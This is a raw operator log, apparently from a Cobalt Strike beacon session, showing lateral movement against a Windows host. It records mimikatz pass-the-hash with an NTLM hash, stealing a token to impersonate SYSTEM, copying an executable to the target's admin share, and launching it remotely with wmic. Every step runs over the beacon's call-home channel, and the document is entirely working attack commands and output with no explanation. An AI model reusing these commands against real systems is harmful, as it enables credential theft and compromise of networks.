beacon> shell dir \\TARGET\c$ [*] Tasked beacon to run: dir \\TARGET\c$ [+] host called home, sent: 52 bytes [+] received output: Volume in drive \\TARGET\c$ has no label. Volume Serial Number is 00EE-EB32
beacon> shell mimi.exe "sekurlsa::pth /user:test /domain:TEST.COM /ntlm:4ff977a6aexxxxxxxxx5eb286af790b" [*] Tasked beacon to run: mimi.exe "sekurlsa::pth /user:test /domain:TEST.COM /ntlm:4ff977a6aexxxxxxxxx5eb286af790b" [+] host called home, sent: 123 bytes [+] received output:
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::pth /user:test /domain:TEST.COM /ntlm:4ff977a6aexxxxxxxxx5eb286af790b user : test domain : TEST.COM program : cmd.exe impers. : no NTLM : 4ff977a6aexxxxxxxxx5eb286af790b | PID 8572 | TID 17812 | LSA Process is now R/W | LUID 1 ; 1401080865 (00000001:5382cc21) \_ msv1_0 - data copy @ 000001D56F74E560 : OK ! \_ kerberos - data copy @ 000001D5716E0BD8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001D5725F1A18 (32) -> null
mimikatz # beacon> steal_token 8572 [*] Tasked beacon to steal token from PID 8572 [+] host called home, sent: 12 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> shell dir \\TARGET\c$ [*] Tasked beacon to run: dir \\TARGET\c$ [+] host called home, sent: 52 bytes [+] received output: Volume in drive \\TARGET\c$ has no label. Volume Serial Number is 00EE-EB32
beacon> shell copy 91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe \\TARGET\C$\windows [*] Tasked beacon to run: copy 91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe \\TARGET\C$\windows [+] host called home, sent: 102 bytes [+] received output: 1 file(s) copied.
beacon> shell wmic /node:TARGET process call create "c:\windows\91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe" [*] Tasked beacon to run: wmic /node:TARGET process call create "c:\windows\91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe" [+] host called home, sent: 128 bytes [+] received output: Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters: instance of __PARAMETERS { ProcessId = 7372; ReturnValue = 0; };